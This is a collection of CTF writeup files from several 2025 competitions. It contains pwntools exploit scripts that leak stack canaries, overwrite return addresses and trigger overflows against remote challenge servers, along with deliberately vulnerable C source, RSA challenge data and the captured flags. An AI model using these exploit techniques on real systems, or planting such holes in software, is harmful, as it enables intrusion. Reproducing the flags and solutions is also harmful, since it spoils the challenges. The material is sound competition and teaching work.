/2025_04_11_1753CTF25/pwn/leakcan/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./leakcan_chall", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("leakcan-25b8ac0dd7fd.tcp.1753ctf.com", 8435) 12 | 13 | p.sendlineafter(b"What's your name", b"A" * 0x58) 14 | p.readline() 15 | p.readline() 16 | canary = u64(b"\x00" + p.recv(7)) 17 | 18 | payload = b"" 19 | payload += b"A" * 0x58 20 | payload += p64(canary) + p64(0) 21 | payload += p64(elf.sym["your_goal"]) 22 | p.sendline(payload) 23 | 24 | p.readuntil(b"1753c{") 25 | print("1753c{" + p.readuntil(b"}").decode()) # 1753c{c4n4ry_1f_th3r35_4_m3m_l34k} 26 | -------------------------------------------------------------------------------- /2025_04_11_1753CTF25/pwn/leakcan/leakcan_chall: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_04_11_1753CTF25/pwn/leakcan/leakcan_chall -------------------------------------------------------------------------------- /2025_04_12_THCon2K25CTF/README.md: -------------------------------------------------------------------------------- 1 | # THCon 2K25 CTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2660 4 | 5 | 141st place 168 points 6 | -------------------------------------------------------------------------------- /2025_04_12_THCon2K25CTF/pwn/gopwn/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | p = remote("74.234.198.209", 33243) 7 | 8 | payload = b"" 9 | payload += p8(1) # login 10 | payload += p8(0xff) 11 | payload += b"A" * 64 12 | payload += p64(1) # isAdmin 13 | p.sendline(payload) 14 | 15 | payload = b"" 16 | payload += p8(3) # flag 17 | payload += p8(0) 18 | p.sendline(payload) 19 | 20 | p.readuntil(b"THC{") 21 | print("THC{" + p.readuntil(b"}").decode()) # THC{C4r3fUL_w17h_1N7_0v3rf10w_U51n9_C_1N_G0} 22 | -------------------------------------------------------------------------------- /2025_04_12_THCon2K25CTF/pwn/gopwn/gopwn.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_04_12_THCon2K25CTF/pwn/gopwn/gopwn.zip -------------------------------------------------------------------------------- /2025_04_18_DawgCTF25/README.md: -------------------------------------------------------------------------------- 1 | # DawgCTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2651 4 | 5 | 311th place 1875 points 6 | -------------------------------------------------------------------------------- /2025_04_18_DawgCTF25/crypto/baby_rsa_1/output.txt: -------------------------------------------------------------------------------- 1 | N = 82012538447359821165849738352756467719053530066892750177578020351019136006996881441650616631012602654920370573185549134046659875914860421394782338722082599261391182262036434549525388081948429632803770833590739702562845306267418403878169267641023564108136843672261999376998284926318313315387819024961709097101 2 | e = 65537 3 | ct = 16978597269030388872549064541934623430749704732655891928833779185083334396093332647023718343748730349576361193985691953617733288330780060179716905267988202710452028943623598185277149645724247199640730959820455032298145782015884558972868277752456856802145299858618876838286795962548300080924547387662096543717 4 | 5 | a = 149738867837230590596162146900 6 | b = 743799113257239690478459408953 7 | c = 351498883480247386367558572595 8 | d = 1175770398223262147164171561358 9 | 10 | x = 6836728736678282915469852947219518538837808913380425472016857154639492051766923345186030197640091719641785981050969319578519968972834509899732176840511342124020344870655741074618585883 11 | y = 12203451977234755811396526665700561863946871005728263879373008871704520841041885029745864562375412192520795388389509063064717933869698154304534842876137996238014648925041725231457010083 12 | -------------------------------------------------------------------------------- /2025_04_18_DawgCTF25/crypto/baby_rsa_1/source.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import * 2 | from sage.all import randint 3 | 4 | p = getPrime(512) 5 | q = getPrime(512) 6 | N = p * q 7 | 8 | e = 0x10001 9 | 10 | m = bytes_to_long(b"DawgCTF{fake_flag}") 11 | 12 | c = pow(m, e, N) 13 | 14 | print("N =", N) 15 | print("e =", e) 16 | print("ct =", c) 17 | print() 18 | 19 | a = randint(0, 2**100) 20 | b = randint(0, 2**100) 21 | c = randint(0, 2**100) 22 | d = randint(0, 2**100) 23 | 24 | x = a * p + b * q 25 | y = c * p + d * q 26 | 27 | print("a =", a) 28 | print("b =", b) 29 | print("c =", c) 30 | print("d =", d) 31 | print() 32 | print("x =", x) 33 | print("y =", y) 34 | 35 | 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /2025_04_18_DawgCTF25/crypto/baby_rsa_2/chall.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import * 2 | from secret import flag 3 | 4 | # This is my stuff! Don't look at it 5 | p = getPrime(512) 6 | q = getPrime(512) 7 | N = p * q 8 | 9 | e_priv = 0x10001 10 | phi = (p - 1) * (q - 1) 11 | 12 | d_priv = inverse(e_priv, phi) 13 | 14 | m = bytes_to_long(flag) 15 | c = pow(m, e_priv, N) 16 | 17 | # This is your stuff! 18 | e_pub = getPrime(16) 19 | 20 | d_pub = inverse(e_pub, phi) 21 | 22 | print(f"e = {e_pub}") 23 | print(f"d = {d_pub}") 24 | print(f"N = {N}") 25 | print(f"c = {c}") 26 | -------------------------------------------------------------------------------- /2025_04_18_DawgCTF25/crypto/baby_rsa_2/output.txt: -------------------------------------------------------------------------------- 1 | e = 58271 2 | d = 16314065939355844497428646964774413938010062495984944007868244761330321449198604198404787327825341236658059256072790190934480082681534717838850610633320375625893501985237981407305284860652632590435055933317638416556532857376955427517397962124909869006289022084571993305966362498048396739334756594170449299859 3 | N = 119082667712915497270407702277886743652985638444637188059938681008077058895935345765407160513555112013190751711213523389194925328565164667817570328474785391992857634832562389502866385475392702847788337877472422435555825872297998602400341624700149407637506713864175123267515579305109471947679940924817268027249 4 | c = 107089582154092285354514758987465112016144455480126366962910414293721965682740674205100222823439150990299989680593179350933020427732386716386685052221680274283469481350106415150660410528574034324184318354089504379956162660478769613136499331243363223860893663583161020156316072996007464894397755058410931262938 5 | -------------------------------------------------------------------------------- /2025_04_18_DawgCTF25/pwn/64_bits_in_my_ark_and_texture/chall: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_04_18_DawgCTF25/pwn/64_bits_in_my_ark_and_texture/chall -------------------------------------------------------------------------------- /2025_04_18_DawgCTF25/pwn/clobber/clobber: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_04_18_DawgCTF25/pwn/clobber/clobber -------------------------------------------------------------------------------- /2025_04_18_DawgCTF25/pwn/clobber/ld.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_04_18_DawgCTF25/pwn/clobber/ld.so -------------------------------------------------------------------------------- /2025_04_18_DawgCTF25/pwn/clobber/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_04_18_DawgCTF25/pwn/clobber/libc.so.6 -------------------------------------------------------------------------------- /2025_04_18_DawgCTF25/pwn/interns_project/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./task", checksec=False) 7 | context.binary = elf 8 | #context.terminal = ["ghostty", "-e"] 9 | 10 | #p = elf.process() 11 | #p = elf.debug(gdbscript="") 12 | p = remote("connect.umbccd.net", 20011) 13 | 14 | p.sendline(b"1 2") 15 | 16 | p.readuntil(b"DawgCTF{") 17 | print("DawgCTF{" + p.readuntil(b"}").decode()) # DawgCTF{B@d_P3rm1ssi0ns} 18 | -------------------------------------------------------------------------------- /2025_04_18_DawgCTF25/pwn/interns_project/interns'Project: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_04_18_DawgCTF25/pwn/interns_project/interns'Project -------------------------------------------------------------------------------- /2025_04_18_DawgCTF25/pwn/just_parry_lol/frame_trap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_04_18_DawgCTF25/pwn/just_parry_lol/frame_trap -------------------------------------------------------------------------------- /2025_04_18_DawgCTF25/pwn/just_parry_lol/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./frame_trap", checksec=False) 7 | context.binary = elf 8 | #context.terminal = ["ghostty", "-e"] 9 | 10 | #p = elf.process() 11 | #p = elf.debug(gdbscript="") 12 | p = remote("connect.umbccd.net", 25699) 13 | 14 | p.sendlineafter(b"Enter your warrior name: ", b"AUTOPARRY") 15 | 16 | p.sendlineafter(b"Enter choice: ", b"5") 17 | p.sendlineafter(b"Enter choice: ", b"5") 18 | 19 | p.readuntil(b"DawgCTF{") 20 | print("DawgCTF{" + p.readuntil(b"}").decode()) # DawgCTF{fr4me_d4ta_m4nipulat10n} 21 | -------------------------------------------------------------------------------- /2025_04_25_UMDCTF25/README.md: -------------------------------------------------------------------------------- 1 | # UMDCTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2563 4 | 5 | 353rd place 712 points 6 | -------------------------------------------------------------------------------- /2025_04_25_UMDCTF25/pwn/gambling2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 AS app 2 | RUN dpkg --add-architecture i386 3 | RUN apt update && apt install -y libc6:i386 4 | FROM pwn.red/jail 5 | 6 | COPY --from=app / /srv 7 | COPY ./gambling /srv/app/run 8 | COPY ./flag.txt /srv/app/flag.txt 9 | 10 | RUN chmod +x /srv/app/run 11 | 12 | ENV JAIL_PORT=1447 JAIL_MEM=16M JAIL_ENV_NUM=5 JAIL_PID=20 JAIL_TIME=600 13 | -------------------------------------------------------------------------------- /2025_04_25_UMDCTF25/pwn/gambling2/Makefile: -------------------------------------------------------------------------------- 1 | gambling: gambling.c 2 | gcc -m32 gambling.c -fno-stack-protector -no-pie -fno-pic -o gambling -O2 3 | -------------------------------------------------------------------------------- /2025_04_25_UMDCTF25/pwn/gambling2/gambling: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_04_25_UMDCTF25/pwn/gambling2/gambling -------------------------------------------------------------------------------- /2025_04_25_UMDCTF25/pwn/gambling2/gambling.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | float rand_float() { 6 | return (float)rand() / RAND_MAX; 7 | } 8 | 9 | void print_money() { 10 | system("/bin/sh"); 11 | } 12 | 13 | void gamble() { 14 | float f[4]; 15 | float target = rand_float(); 16 | printf("Enter your lucky numbers: "); 17 | scanf(" %lf %lf %lf %lf %lf %lf %lf", f,f+1,f+2,f+3,f+4,f+5,f+6); 18 | if (f[0] == target || f[1] == target || f[2] == target || f[3] == target || f[4] == target || f[5] == target || f[6] == target) { 19 | printf("You win!\n"); 20 | // due to economic concerns, we're no longer allowed to give out prizes. 21 | // print_money(); 22 | } else { 23 | printf("Aww dang it!\n"); 24 | } 25 | } 26 | 27 | int main(void) { 28 | setvbuf(stdout, NULL, _IONBF, 0); 29 | setvbuf(stdin, NULL, _IONBF, 0); 30 | 31 | char buf[20]; 32 | srand(420); 33 | while (1) { 34 | gamble(); 35 | getc(stdin); // consume newline 36 | printf("Try again? "); 37 | fgets(buf, 20, stdin); 38 | if (strcmp(buf, "no.\n") == 0) { 39 | break; 40 | } 41 | } 42 | } 43 | 44 | 45 | -------------------------------------------------------------------------------- /2025_04_25_UMDCTF25/pwn/gambling2/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import struct 4 | from pwn import * 5 | 6 | context.log_level = "debug" 7 | elf = ELF("./gambling") 8 | context.binary = elf 9 | context.terminal = ["ghostty", "-e"] 10 | 11 | #p = elf.process() 12 | #p = elf.debug(gdbscript="b gamble") 13 | p = remote("challs.umdctf.io", 31005) 14 | 15 | payload = b"" 16 | payload += b"0 0 0 0 0 0 " 17 | payload += str(struct.unpack("